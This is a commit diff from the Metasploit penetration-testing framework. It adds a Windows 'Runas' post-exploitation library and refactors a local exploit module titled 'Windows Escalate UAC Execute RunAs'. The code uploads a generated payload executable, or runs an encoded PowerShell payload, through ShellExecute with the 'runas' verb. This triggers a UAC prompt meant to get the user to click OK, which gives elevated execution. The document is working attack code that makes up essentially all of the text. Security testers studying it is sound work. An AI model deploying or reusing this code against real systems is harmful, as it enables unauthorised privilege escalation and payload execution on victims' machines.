Land rapid7#2551, Runas post library and powershell ask technique

Author: Meatballs1

lib/msf/core/post/windows.rb

@@ -11,6 +11,7 @@ module Msf::Post::Windows
   require 'msf/core/post/windows/process'
   require 'msf/core/post/windows/railgun'
   require 'msf/core/post/windows/registry'
+  require 'msf/core/post/windows/runas'
   require 'msf/core/post/windows/services'
   require 'msf/core/post/windows/wmic'
   require 'msf/core/post/windows/netapi'

lib/msf/core/post/windows/runas.rb

@@ -0,0 +1,38 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/powershell'
+require 'msf/core/exploit/exe'
+
+module Msf::Post::Windows::Runas
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Powershell
+
+  def execute_exe(filename = nil, path = nil, upload = nil)
+    payload_filename = filename || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
+    payload_path = path || get_env('TEMP')
+    cmd_location = "#{payload_path}\\#{payload_filename}"
+
+    if upload
+      exe_payload = generate_payload_exe
+      print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
+      write_file(cmd_location, exe_payload)
+    else
+      print_status("No file uploaded, attempting to execute #{cmd_location}...")
+    end
+
+    shell_exec(cmd_location, nil)
+  end
+
+  def execute_psh
+    powershell_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    command = 'cmd.exe'
+    args = "/c #{powershell_command}"
+    shell_exec(command, args)
+  end
+
+  def shell_exec(command, args)
+    print_status('Executing elevated command...')
+    session.railgun.shell32.ShellExecuteA(nil, 'runas', command, args, nil, 'SW_SHOW')
+  end
+end

modules/exploits/windows/local/ask.rb

@@ -4,96 +4,65 @@
 ##
 
 require 'msf/core'
-require 'msf/core/exploit/exe'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
-  include Exploit::EXE
-  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::Runas
 
-  def initialize(info={})
-    super( update_info( info,
+  def initialize(info = {})
+    super(update_info(info,
       'Name'          => 'Windows Escalate UAC Execute RunAs',
-      'Description'   => %q{
+      'Description'   => %q(
         This module will attempt to elevate execution level using
         the ShellExecute undocumented RunAs flag to bypass low
         UAC settings.
-      },
+      ),
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'mubix' ],
-      'Platform'      => [ 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ],
-      'Targets'       => [ [ 'Windows', {} ] ],
+      'Author'        => [
+        'mubix', # Original technique
+        'b00stfr3ak' # Added powershell option
+      ],
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [['Windows', {}]],
       'DefaultTarget' => 0,
       'References'    => [
-        [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
+        ['URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html']
       ],
-      'DisclosureDate'=> "Jan 3 2012"
+      'DisclosureDate' => 'Jan 3 2012'
     ))
 
     register_options([
-      OptString.new("FILENAME", [ false, "File name on disk"]),
-      OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
-      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
+      OptString.new('FILENAME', [false, 'File name on disk']),
+      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
+      OptBool.new('UPLOAD', [true, 'Should the payload be uploaded?', true]),
+      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),
     ])
-
   end
 
   def exploit
-
-    root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
-    open_key = session.sys.registry.open_key(root_key, base_key)
-    lua_setting = open_key.query_value('EnableLUA')
-
-    if lua_setting.data == 1
-      print_status "UAC is Enabled, checking level..."
+    if is_uac_enabled?
+      print_status 'UAC is Enabled, checking level...'
+      case get_uac_level
+      when UAC_NO_PROMPT
+        print_good 'UAC is not enabled, no prompt for the user'
+      else
+        print_status "The user will be prompted, wait for them to click 'Ok'"
+      end
     else
-      print_good "UAC is not enabled, no prompt for the user"
-    end
-
-    uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
-
-    case uac_level.data
-    when 2
-      print_status "UAC is set to 'Always Notify'"
-      print_status "The user will be prompted, wait for them to click 'Ok'"
-    when 5
-      print_debug "UAC is set to Default"
-      print_debug "The user will be prompted, wait for them to click 'Ok'"
-    when 0
-      print_good "UAC is not enabled, no prompt for the user"
+      print_good 'UAC is not enabled, no prompt for the user'
     end
 
-
     #
     # Generate payload and random names for upload
     #
-    payload = generate_payload_exe
-
-    if datastore["FILENAME"]
-      payload_filename = datastore["FILENAME"]
-    else
-      payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    case datastore['TECHNIQUE']
+    when 'EXE'
+      execute_exe(datastore['FILENAME'], datastore['PATH'], datastore['UPLOAD'])
+    when 'PSH'
+      execute_psh
     end
-
-    if datastore["PATH"]
-      payload_path = datastore["PATH"]
-    else
-      payload_path = session.sys.config.getenv('TEMP')
-    end
-
-    cmd_location = "#{payload_path}\\#{payload_filename}"
-
-    if datastore["UPLOAD"]
-      print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
-      fd = session.fs.file.new(cmd_location, "wb")
-      fd.write(payload)
-      fd.close
-    end
-
-    session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
-
   end
 end
-